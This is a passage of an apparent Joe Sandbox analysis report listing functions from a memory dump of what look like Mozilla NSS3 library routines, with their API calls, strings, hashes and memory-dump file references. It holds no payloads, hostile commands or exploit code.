memcpy.VCRUNTIME140(?,00000210,0000011C,?,?,?,?,6C7D80AD), ref: 6C7DABFE
memcpy.VCRUNTIME140(?,000006AA,?,?,?,?,?,?,?,?,6C7D80AD), ref: 6C7DAC1C
memcpy.VCRUNTIME140(?,000006C0,?,?,?,?,?,?,?,?,?,?,?,6C7D80AD), ref: 6C7DAC48

Part of subcall function 6C7D5BC0: PR_EnterMonitor.NSS3(8B105D8B,?,?,6C7D80E3,00000000), ref: 6C7D5BD6
Part of subcall function 6C7D5BC0: PR_EnterMonitor.NSS3(840FC085,?,?,6C7D80E3,00000000), ref: 6C7D5BED
Part of subcall function 6C7D5BC0: PR_EnterMonitor.NSS3(07890478,?,?,6C7D80E3,00000000), ref: 6C7D5C04
Part of subcall function 6C7D5BC0: PR_EnterMonitor.NSS3(000000F4,?,?,6C7D80E3,00000000), ref: 6C7D5C1B
Part of subcall function 6C7D5BC0: PR_Unlock.NSS3(0140BCE8,?,?,6C7D80E3,00000000), ref: 6C7D5C4C
Part of subcall function 6C7D5BC0: PR_Unlock.NSS3(08C48300,?,?,6C7D80E3,00000000), ref: 6C7D5C5F
Part of subcall function 6C7D5BC0: PR_ExitMonitor.NSS3(8B105D8B,?,?,6C7D80E3,00000000), ref: 6C7D5C76
Part of subcall function 6C7D5BC0: PR_ExitMonitor.NSS3(840FC085,?,?,6C7D80E3,00000000), ref: 6C7D5C8D
Part of subcall function 6C7D5BC0: PR_ExitMonitor.NSS3(07890478,?,?,6C7D80E3,00000000), ref: 6C7D5CA4
Part of subcall function 6C7D5BC0: PR_ExitMonitor.NSS3(000000F4,?,?,6C7D80E3,00000000), ref: 6C7D5CBB

PORT_ZAlloc_Util.NSS3(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7D80AD), ref: 6C7DACED

Part of subcall function 6C7A0D30: calloc.MOZGLUE ref: 6C7A0D50
Part of subcall function 6C7A0D30: TlsGetValue.KERNEL32 ref: 6C7A0D6D

PORT_ZAlloc_Util.NSS3(0000001C,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7D80AD), ref: 6C7DAD52
SECKEY_CopyPrivateKey.NSS3(?), ref: 6C7DAEE5
SECKEY_CopyPublicKey.NSS3(?), ref: 6C7DAEFC

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Monitor$Util$memcpy$Alloc_EnterExit$Copy$Strdup_Unlock$ArenaItem_PrivatePublicValuecalloc
String ID:
API String ID: 3422837898-0
Opcode ID: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction ID: 92dec87458e564a68c1f8024cb8b34318e5a88592fdef52889816c6ca5be6b49
Opcode Fuzzy Hash: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction Fuzzy Hash: C3D1F5B5A012028FDB44CF28C984BE5B7E5BF48314F1982B9DC1DDB706E734A995CBA1

Function 6C746DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C747D8F,6C747D8F,?,?), ref: 6C746DC8

Part of subcall function 6C79FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C79FE08
Part of subcall function 6C79FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C79FE1D
Part of subcall function 6C79FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C79FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C747D8F,?,?), ref: 6C746DD5

Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A10F3
Part of subcall function 6C7A10C0: EnterCriticalSection.KERNEL32(?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A110C
Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1141
Part of subcall function 6C7A10C0: PR_Unlock.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1182
Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C868FA0,00000000,?,?,?,?,6C747D8F,?,?), ref: 6C746DF7

Part of subcall function 6C79B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8718D0,?), ref: 6C79B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C746E35

Part of subcall function 6C79FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C79FE29
Part of subcall function 6C79FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C79FE3D
Part of subcall function 6C79FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C79FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C746E4C

Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C868FE0,00000000), ref: 6C746E82

Part of subcall function 6C746AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C74B21D,00000000,00000000,6C74B219,?,6C746BFB,00000000,?,00000000,00000000,?,?,?,6C74B21D), ref: 6C746B01
Part of subcall function 6C746AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C746B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C746F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C746F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C868FE0,00000000), ref: 6C746F6B
PR_SetError.NSS3(FFFFE005,00000000,6C747D8F,?,?), ref: 6C746FE1

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 805a56cb31da29e69f09945ac3426737b8a205b3ea250fd1db657388458887e0
Instruction ID: f5d16a49fc6a819e81090731731b1b207c5de246829df04ad62bcef2c9227ae8
Opcode Fuzzy Hash: 805a56cb31da29e69f09945ac3426737b8a205b3ea250fd1db657388458887e0
Instruction Fuzzy Hash: A671A471D106469FEB00CF55DE44BAA7BA4FF54308F158229E848D7B11F770EA94CB90

Function 6C78ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE10
EnterCriticalSection.KERNEL32(?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C76D079,00000000,00000001), ref: 6C78AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE7F
TlsGetValue.KERNEL32(?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AEF1
free.MOZGLUE(6C76CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C76CDBB,?), ref: 6C78AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AF30

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 667fcbd8e2eedff208f775dd8dd35b3c1f42cffa9ef306c6794879d4de16af81
Instruction ID: 08d5d9bc5689121858728d812e30a925875624efa1f0dc387329c3e63bdca5fd
Opcode Fuzzy Hash: 667fcbd8e2eedff208f775dd8dd35b3c1f42cffa9ef306c6794879d4de16af81
Instruction Fuzzy Hash: B551A0B1A02601AFDB11DF29D989B59B7B4FF04328F044674EA0897E52E731F864CBE1

Function 6C764CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C76AB7F,?,00000000,?), ref: 6C764CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C76AB7F,?,00000000,?), ref: 6C764CC8
TlsGetValue.KERNEL32(?,6C76AB7F,?,00000000,?), ref: 6C764CE0
EnterCriticalSection.KERNEL32(?,?,6C76AB7F,?,00000000,?), ref: 6C764CF4
PL_HashTableLookup.NSS3(?,?,?,6C76AB7F,?,00000000,?), ref: 6C764D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C764D10

Part of subcall function 6C7EDD70: TlsGetValue.KERNEL32 ref: 6C7EDD8C
Part of subcall function 6C7EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7EDDB4

PR_Now.NSS3(?,00000000,?), ref: 6C764D26

Part of subcall function 6C809DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C850A27), ref: 6C809DC6
Part of subcall function 6C809DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C850A27), ref: 6C809DD1
Part of subcall function 6C809DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C809DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C764D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C764DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C764E02

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: facefe9d08b07be6754d0ac4332ac15631f025b543a7e4748e25933d1474a192
Instruction ID: 918df311e044a6a0c32a83bcf0f425ece34b9e9a05d8be05ef223ff4c10ad97f
Opcode Fuzzy Hash: facefe9d08b07be6754d0ac4332ac15631f025b543a7e4748e25933d1474a192
Instruction Fuzzy Hash: F241C4B6E00205ABEB119F29EE5996A77A8AF1535CF044170ED0887B12EB31D928C7D2

Function 6C7E4A70 Relevance: 15.1, APIs: 10, Instructions: 113memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(00000048,00000A20,0000032C,?,00000000,?,6C7DAEC0,00000A20,00000000), ref: 6C7E4A8B

Part of subcall function 6C7A0D30: calloc.MOZGLUE ref: 6C7A0D50
Part of subcall function 6C7A0D30: TlsGetValue.KERNEL32 ref: 6C7A0D6D

SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,00000000), ref: 6C7E4AAA

Part of subcall function 6C79FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C798D2D,?,00000000,?), ref: 6C79FB85
Part of subcall function 6C79FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C79FBB1

PORT_Strdup_Util.NSS3(?,?,?,?,00000000), ref: 6C7E4ABD

Part of subcall function 6C7A0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C742AF5,?,?,?,?,?,6C740A1B,00000000), ref: 6C7A0F1A
Part of subcall function 6C7A0F10: malloc.MOZGLUE(00000001), ref: 6C7A0F30
Part of subcall function 6C7A0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7A0F42

SECITEM_CopyItem_Util.NSS3(00000000,00000020,?,?,?,?,?,00000000), ref: 6C7E4AD6
SECITEM_CopyItem_Util.NSS3(00000000,00000034,?,?,?,?,?,?,?,?,00000000), ref: 6C7E4AEC

Part of subcall function 6C79FB60: PORT_Alloc_Util.NSS3(E0056800,00000000,?,?,6C798D2D,?,00000000,?), ref: 6C79FB9B

SECITEM_ZfreeItem_Util.NSS3(00000020,00000000,?,?,?,00000000), ref: 6C7E4B49
SECITEM_ZfreeItem_Util.NSS3(-00000034,00000000,?,?,?,?,?,00000000), ref: 6C7E4B58
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6C7E4B64
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7E4B74
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7E4B7E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Item_$Alloc_CopyZfree$freememcpy$ArenaStrdup_Valuecallocmallocstrlen
String ID:
API String ID: 476651045-0
Opcode ID: 5bc7569c0d08db50e732e34a123406182e3415405c7310eca4dd9b13574acabe
Instruction ID: b570d343f52c510c35afeac389277bdbf6cd684b42557194e326ebd6879c832f
Opcode Fuzzy Hash: 5bc7569c0d08db50e732e34a123406182e3415405c7310eca4dd9b13574acabe
Instruction Fuzzy Hash: 90319EB65002019FD710DF69EE89A57BBB8FF09248B044579ED4ACBB02F731E505CBA1

Function 6C7689C0 Relevance: 15.1, APIs: 10, Instructions: 84COMMON

Download Yara Rule

APIs

PK11_CreateDigestContext.NSS3(00000004,00000000,00000000,00000000,00000000,?,6C76AE9B,00000000,?,?), ref: 6C7689DE
PK11_DigestBegin.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C742D6B,?,?,00000000), ref: 6C7689EF
PK11_DigestOp.NSS3(00000000,57016AC6,034C08E8,?,00000000,?,?,?,?,?,?,?,?,?,?,6C742D6B), ref: 6C768A02
PK11_DestroyContext.NSS3(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6C742D6B,?), ref: 6C768A11

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: K11_$Digest$Context$BeginCreateDestroy
String ID:
API String ID: 407214398-0
Opcode ID: 01047e4b80f03f11eedb7a75096f0bf0540f308380bc41632b0b2953eccbcaa8
Instruction ID: 8bfec13b3ebe985315c5479d4f1a33baf31ace9c852d5156ef2546e351fd9235
Opcode Fuzzy Hash: 01047e4b80f03f11eedb7a75096f0bf0540f308380bc41632b0b2953eccbcaa8
Instruction Fuzzy Hash: 9D11B7F2A0030166FB005A67AF89BAB7558AB4279DF080136ED0999F42F762D519D3F2

Function 6C742E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C742CDA,?,00000000), ref: 6C742E1E

Part of subcall function 6C79FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C749003,?), ref: 6C79FD91
Part of subcall function 6C79FD80: PORT_Alloc_Util.NSS3(A4686C7A,?), ref: 6C79FDA2
Part of subcall function 6C79FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C7A,?,?), ref: 6C79FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C742E33

Part of subcall function 6C79FD80: free.MOZGLUE(00000000,?,?), ref: 6C79FDD1

TlsGetValue.KERNEL32 ref: 6C742E4E
EnterCriticalSection.KERNEL32(?), ref: 6C742E5E
PL_HashTableLookup.NSS3(?), ref: 6C742E71
PL_HashTableRemove.NSS3(?), ref: 6C742E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C742E96
PR_Unlock.NSS3 ref: 6C742EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C742EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C742EC5

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 8d3c8130329e1d289e53cdfc2140258fff6416d15d0f8de5f28fd03072f7e3bd
Instruction ID: 15e64467b0d9c6582afdb25caf3fc1f9d3e159f991f7ca3c337d286d4624fb20
Opcode Fuzzy Hash: 8d3c8130329e1d289e53cdfc2140258fff6416d15d0f8de5f28fd03072f7e3bd
Instruction Fuzzy Hash: 7E21F572A00111A7EF215B6AEE0DE9B3A69EB5235DF044030ED1CC6722FB32D568D6E1

Function 6C7B8C10 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7B8C93

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

Part of subcall function 6C798A60: TlsGetValue.KERNEL32(6C7461C4,?,6C745F9C,00000000), ref: 6C798A81
Part of subcall function 6C798A60: TlsGetValue.KERNEL32(?,?,?,6C745F9C,00000000), ref: 6C798A9E
Part of subcall function 6C798A60: EnterCriticalSection.KERNEL32(?,?,?,?,6C745F9C,00000000), ref: 6C798AB7
Part of subcall function 6C798A60: PR_Unlock.NSS3(?,?,?,?,?,6C745F9C,00000000), ref: 6C798AD2

memset.VCRUNTIME140(?,00000000,?), ref: 6C7B8CFB
memset.VCRUNTIME140(?,00000000,?), ref: 6C7B8D10

Part of subcall function 6C798970: TlsGetValue.KERNEL32(?,00000000,6C7461C4,?,6C745639,00000000), ref: 6C798991
Part of subcall function 6C798970: TlsGetValue.KERNEL32(?,?,?,?,?,6C745639,00000000), ref: 6C7989AD
Part of subcall function 6C798970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C745639,00000000), ref: 6C7989C6
Part of subcall function 6C798970: PR_WaitCondVar.NSS3 ref: 6C7989F7
Part of subcall function 6C798970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C745639,00000000), ref: 6C798A0C

Strings

/G6/, xrefs: 6C7B8C1C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
String ID: /G6/
API String ID: 2412912262-570549270
Opcode ID: 79d143ee878caa3c93288c3c3f8616123c4eb07f387e761d1039e3667b1bd71e
Instruction ID: c8488692c8cde8fd1027ae409e4194382f9d19871cc67b90c3691cc30bfc7909
Opcode Fuzzy Hash: 79d143ee878caa3c93288c3c3f8616123c4eb07f387e761d1039e3667b1bd71e
Instruction Fuzzy Hash: A8B18CB0D002099FDB14CF65DD84AAEB7BAFF48308F10413EE91AA7752E731A955CB91

Function 6C6CCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C6CB999), ref: 6C6CCFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C6CB999), ref: 6C6CD02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C6CB999), ref: 6C6CD041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C6CB999), ref: 6C81972B

Strings

%s at line %d of [%.10s], xrefs: 6C6CCFEC, 6C6CD018, 6C6CD029, 6C6CD03F, 6C81978B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6CCFDD, 6C6CD00E, 6C6CD022, 6C6CD033, 6C819780
database corruption, xrefs: 6C6CCFE7, 6C6CD013, 6C6CD028, 6C6CD039, 6C6CD03E, 6C819786

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: a4e867ca1b5cff433699a3b620a0a20a1f59b3accc6b2f50aa4426977f1c5199
Instruction ID: 9f8d82a57ff0fb8fc998156b1beef715d02746a5c698914c427d305a4da42a11
Opcode Fuzzy Hash: a4e867ca1b5cff433699a3b620a0a20a1f59b3accc6b2f50aa4426977f1c5199
Instruction Fuzzy Hash: 04616971A042109BD320CF29C940BABB7F2EF95318F5849ADE4499FB42E376D847C7A5

Function 6C7A4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C7A536F,00000022,?,?,00000000,?), ref: 6C7A4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C7A4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C7A4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C7A4FAE
free.MOZGLUE(?), ref: 6C7A4FC8

Strings

oSzl", xrefs: 6C7A4DFB, 6C7A4EF4, 6C7A4EC5
%s=%c%s%c, xrefs: 6C7A4FA9
%s=%s, xrefs: 6C7A4F89

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

